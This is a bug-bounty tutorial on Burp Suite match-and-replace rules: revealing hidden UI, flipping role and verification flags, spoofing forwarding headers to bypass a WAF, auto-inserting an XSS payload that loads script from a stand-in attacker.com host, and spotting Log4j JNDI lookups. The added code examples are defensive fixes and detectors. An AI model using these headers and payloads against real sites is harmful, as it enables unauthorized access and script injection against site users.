Useful Match and Replace BurpSuite Rules
Finding hidden buttons, forms, and other UI elements
Many websites contain hidden buttons, forms and other UI elements, for example:
```html
<div aria-hidden="true"></div>
<div style="visibility: hidden;"></div>
<div style="display: none;"></div>
<script>document.getElementsByTagName("test")[0].hidden = true;</script>
<button type="button" disabled>test</button>
```
Rules to reveal them:
- Show Hidden UI (1)
- Show Hidden UI (2)
- Change disable to enable
Sometimes hidden features can be unlocked by changing "false" to "true" in the response. For example:
- Changing the role from normal user to admin
- Marking the email as verified
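The rules named above were screenshots in the original post, so the regular expressions below are my own reconstruction, added here as an example and not the author's rules. It models a Burp-style match/replace rule set in Python and applies it to a constructed response body built from the snippets above plus an assumed JSON blob with `role` and `email_verified` keys. The point for developers is visible in the output: everything a proxy can flip (hidden attributes, disabled buttons, client-side flags) is presentation, not authorization, so the server must enforce role and verification state itself.

```python
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Rule:
    """One match/replace rule in the spirit of Burp's feature (field names are assumed)."""
    name: str
    scope: str        # "response_body", "request_header" or "request_first_line"
    pattern: str      # regular expression applied to text in that scope
    replacement: str  # re.sub replacement, may use backreferences


# Assumed regexes reconstructing "Show Hidden UI (1)/(2)" and "Change disable to enable".
SHOW_HIDDEN_UI = [
    Rule("Show Hidden UI (1)", "response_body", r'aria-hidden="true"', 'aria-hidden="false"'),
    Rule("Show Hidden UI (2)", "response_body", r'(visibility\s*:\s*)hidden', r'\1visible'),
    Rule("Show Hidden UI (3)", "response_body", r'(display\s*:\s*)none', r'\1block'),
    Rule("Show Hidden UI (4)", "response_body", r'\.hidden\s*=\s*true', '.hidden = false'),
    # Drop a bare "disabled" attribute from any tag.
    Rule("Change disable to enable", "response_body", r'(<[^>]*?)\s+disabled(?=[\s/>])', r'\1'),
]

# Assumed JSON keys for the "false -> true" idea: the role and the e-mail verification flag.
FALSE_TO_TRUE = [
    Rule("Role to admin", "response_body", r'("role"\s*:\s*")user"', r'\1admin"'),
    Rule("Email verified", "response_body", r'("email_verified"\s*:\s*)false', r'\1true'),
]


def apply_rules(rules, scope, text):
    """Apply every rule for `scope` in order; return (rewritten text, names of rules that fired)."""
    fired = []
    for rule in rules:
        if rule.scope != scope:
            continue
        text, count = re.subn(rule.pattern, rule.replacement, text)
        if count:
            fired.append(rule.name)
    return text, fired


# Constructed response body: the page's snippets plus an assumed inline user object.
SAMPLE_RESPONSE_BODY = """\
<div aria-hidden="true">beta export</div>
<div style="visibility: hidden;">admin link</div>
<div style="display: none;">billing</div>
<script>document.getElementsByTagName("test")[0].hidden = true</script>
<button type="button" disabled>delete</button>
<script>var user = {"role": "user", "email_verified": false};</script>
"""


def reveal_hidden_ui(body=SAMPLE_RESPONSE_BODY):
    """Run the hidden-UI and false->true rules over a response body."""
    return apply_rules(SHOW_HIDDEN_UI + FALSE_TO_TRUE, "response_body", body)


if __name__ == "__main__":
    rewritten, fired = reveal_hidden_ui()
    print(rewritten)
    print("rules that fired:", fired)
```

Scoping the false-to-true rule to specific keys matters: a blanket `false` to `true` replacement also rewrites JavaScript logic and JSON values you did not mean to touch, which is why the two JSON rules above anchor on their key names.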
Bypassing WAF by adding some headers
- Adding the header:
```
X-Forwarded-Host: 127.0.0.1
```
Create another rule for each of the following headers in turn:
```
X-Forwarded-Port: 127.0.0.1
X-Forwarded-By: 127.0.0.1
X-Forwarded-Scheme: 127.0.0.1
X-Frame-Options: Allow
X-Forwarded-For: 127.0.0.1
X-Client-IP: 127.0.0.1
X-Real-IP: 127.0.0.1
X-Originating-IP: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Cluster-Client-IP: 127.0.0.1
True-Client-IP: 127.0.0.1
Client-IP: 127.0.0.1
Origin: null
Origin: Domain.attacker.com
```
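Why these headers work is the server-side bug, so here is the fix seen from that side. This is an added Python example, not code from the post or from any WAF product: it contrasts the weak pattern (believe the first `X-Forwarded-For` entry from anyone) with a resolver that honours forwarding headers only when the TCP peer is a trusted proxy, takes only the hop that proxy appended, and logs a warning when a direct client sends them. The proxy range, the CORS allowlist and the two sample requests are constructed; the `Origin` check shows the same rule for CORS: allowlist, never reflect, and never treat `null` as a real origin.

```python
import ipaddress

# Constructed: address range of the only reverse proxy allowed to set forwarding headers.
TRUSTED_PROXIES = [ipaddress.ip_network("10.0.0.0/8")]

# Client-settable headers from the list above; none carries authority on its own.
SPOOFABLE_IP_HEADERS = (
    "x-forwarded-for", "x-client-ip", "x-real-ip", "x-originating-ip", "x-remote-ip",
    "x-remote-addr", "x-cluster-client-ip", "true-client-ip", "client-ip",
)

# Constructed CORS allowlist; "null" and unknown origins are never reflected back.
ALLOWED_ORIGINS = {"https://app.example.com"}


def naive_client_ip(peer_ip, headers):
    """The weak pattern: believe the first X-Forwarded-For entry, whoever sent it."""
    xff = headers.get("x-forwarded-for")
    return xff.split(",")[0].strip() if xff else peer_ip


def is_trusted_proxy(peer_ip):
    try:
        addr = ipaddress.ip_address(peer_ip)
    except ValueError:
        return False
    return any(addr in net for net in TRUSTED_PROXIES)


def resolve_client_ip(peer_ip, headers):
    """Hardened: honour forwarding headers only from a trusted proxy, and only its own hop.
    Returns (client_ip, warnings). `headers` maps lower-case header names to values."""
    warnings = []
    present = [h for h in SPOOFABLE_IP_HEADERS if h in headers]
    if not is_trusted_proxy(peer_ip):
        if present:
            warnings.append(f"ignored {', '.join(present)} from untrusted peer {peer_ip}")
        return peer_ip, warnings
    xff = headers.get("x-forwarded-for", "")
    hops = [h.strip() for h in xff.split(",") if h.strip()]
    if not hops:
        return peer_ip, warnings
    # With one trusted proxy, only the last hop was appended by it; earlier entries are
    # whatever the client chose to send and must not be used for allowlisting.
    last = hops[-1]
    try:
        ipaddress.ip_address(last)
    except ValueError:
        warnings.append(f"malformed X-Forwarded-For hop {last!r} from proxy {peer_ip}")
        return peer_ip, warnings
    return last, warnings


def cors_allow_origin(origin):
    """Access-Control-Allow-Origin value, or None when the origin is not allowlisted."""
    return origin if origin in ALLOWED_ORIGINS else None


# Constructed requests: a direct client claiming to be localhost, and one via the proxy.
SPOOFED = ("203.0.113.5", {"x-forwarded-for": "127.0.0.1", "x-real-ip": "127.0.0.1"})
VIA_PROXY = ("10.0.0.2", {"x-forwarded-for": "127.0.0.1, 198.51.100.7"})

if __name__ == "__main__":
    print("naive:", naive_client_ip(*SPOOFED))
    print("hardened:", resolve_client_ip(*SPOOFED))
    print("via proxy:", resolve_client_ip(*VIA_PROXY))
```

The warning strings are what a detection rule would key on: a non-proxy peer sending any of these headers is either misconfiguration or exactly the probing this section describes, and either way it deserves a log line.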
Changing the original user UUID to another UUID
Create another rule, but change the type to "Request First Line".
Adding an XSS payload to the request
- Finding XSS in User-Agent
- Finding XSS in Referer
- Auto-replace user input with an XSS payload
By just typing the word xss_payload into the website, it is immediately replaced with "><script src=https://attacker.com></script>. Change the XSS payload as you want.
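The marker trick above also works as a regression test on the application side, which is how I would use it. This is an added Python example, not from the post: a deliberately weak renderer drops `User-Agent` and `Referer` straight into the page, a hardened one escapes for the HTML context and reduces the `Referer` to its host, and `reflects_probe` reports whether a benign probe marker survives unencoded. The probe string, the renderers and the sample values are all constructed; the probe contains the attribute-breaking characters but no script, which is all a check of this kind needs.

```python
import html
from urllib.parse import urlparse

# Constructed probe: a benign marker carrying the characters that close an attribute and a tag.
PROBE = 'xss_probe"><probe>'


def render_unsafe(user_agent, referer):
    """Weak pattern: raw header values dropped into attribute and text contexts."""
    return (f'<p class="ua" title="{user_agent}">'
            f'Came from: <a href="{referer}">{referer}</a></p>')


def render_safe(user_agent, referer):
    """Hardened: escape for the HTML context and keep only the Referer's host."""
    host = urlparse(referer).hostname or ""
    return (f'<p class="ua" title="{html.escape(user_agent, quote=True)}">'
            f'Came from: {html.escape(host, quote=True)}</p>')


def reflects_probe(render, header="user-agent"):
    """True when the probe lands in the output unencoded, i.e. that header is reflected unsafely."""
    benign_ua, benign_ref = "Mozilla/5.0", "https://example.test/path"
    if header == "user-agent":
        out = render(PROBE, benign_ref)
    else:
        out = render(benign_ua, "https://example.test/" + PROBE)
    return PROBE in out


if __name__ == "__main__":
    for name, render in (("unsafe", render_unsafe), ("safe", render_safe)):
        for header in ("user-agent", "referer"):
            print(f"{name:6} {header:10} reflected unencoded: {reflects_probe(render, header)}")
```

Escaping alone is the right fix for the `User-Agent` case; for `Referer`, not rendering the full URL at all removes the reflection surface entirely, which is why the hardened renderer keeps only the host and still escapes it.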
Some random match and replace rules
- Finding CVE-2021-44221
Create additional rules to look for it in headers, parameters and more, because input that reaches Log4j can come from anywhere.
- Help companies identify your traffic and separate it from malicious traffic by adding a custom header
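The "it can be anywhere" observation for the Log4j item cuts both ways: a detection that only inspects one header misses the same places the extra rules cover. This added Python example, not from the post, scans the query string of the request line, every header value and a form body for the generic `${name:...}` lookup syntax, decoding percent-encoding first so an encoded query parameter is still caught. The sample request is constructed and uses the reserved `.invalid` domain; matching the lookup syntax rather than one literal string is what keeps the check from breaking on trivial variations.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Generic lookup syntax "${name:...}" in untrusted input is the signal, not one specific string.
LOOKUP_RE = re.compile(r"\$\{[^}]*:")


def find_lookup_expressions(request_line, headers, body=""):
    """Return [(location, value)] for each query parameter, header or form field
    whose (decoded) value contains a lookup expression."""
    hits = []
    try:
        _method, target, _version = request_line.split(" ", 2)
    except ValueError:
        return hits
    # parse_qsl percent-decodes, so "%24%7B" becomes "${" before matching.
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        if LOOKUP_RE.search(value):
            hits.append((f"query:{name}", value))
    for name, value in headers.items():
        if LOOKUP_RE.search(value):
            hits.append((f"header:{name.lower()}", value))
    for name, value in parse_qsl(body, keep_blank_values=True):
        if LOOKUP_RE.search(value):
            hits.append((f"body:{name}", value))
    return hits


# Constructed request: the marker appears encoded in the query, raw in a header and in the body.
SAMPLE_LINE = "POST /search?q=%24%7Bjndi%3Aldap%3A%2F%2Fexample.invalid%2Fx%7D&page=1 HTTP/1.1"
SAMPLE_HEADERS = {
    "Host": "app.example.com",
    "User-Agent": "${jndi:ldap://example.invalid/x}",
    "X-Api-Version": "1",
}
SAMPLE_BODY = "username=${jndi:ldap://example.invalid/x}&password=hunter2"

if __name__ == "__main__":
    for location, value in find_lookup_expressions(SAMPLE_LINE, SAMPLE_HEADERS, SAMPLE_BODY):
        print(f"{location}: {value}")
```

Run this over access logs or at a reverse proxy and the `location` field tells you which input a rule set was missing; the same loop is where a custom identification header, as in the last item above, can be recognised so that a known tester's traffic is tagged rather than escalated.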
References:
- https://twitter.com/PTestical/status/1413497660133318659
- https://twitter.com/HolyBugx/status/1355472991061213184
- https://twitter.com/intigriti/status/1192103070072741894
- https://twitter.com/payloadartist/status/1469582893772984322
- https://twitter.com/payloadartist/status/1422247377516122114
- https://twitter.com/hackerscrolls/status/1247177578269597698
Will be updated again soon.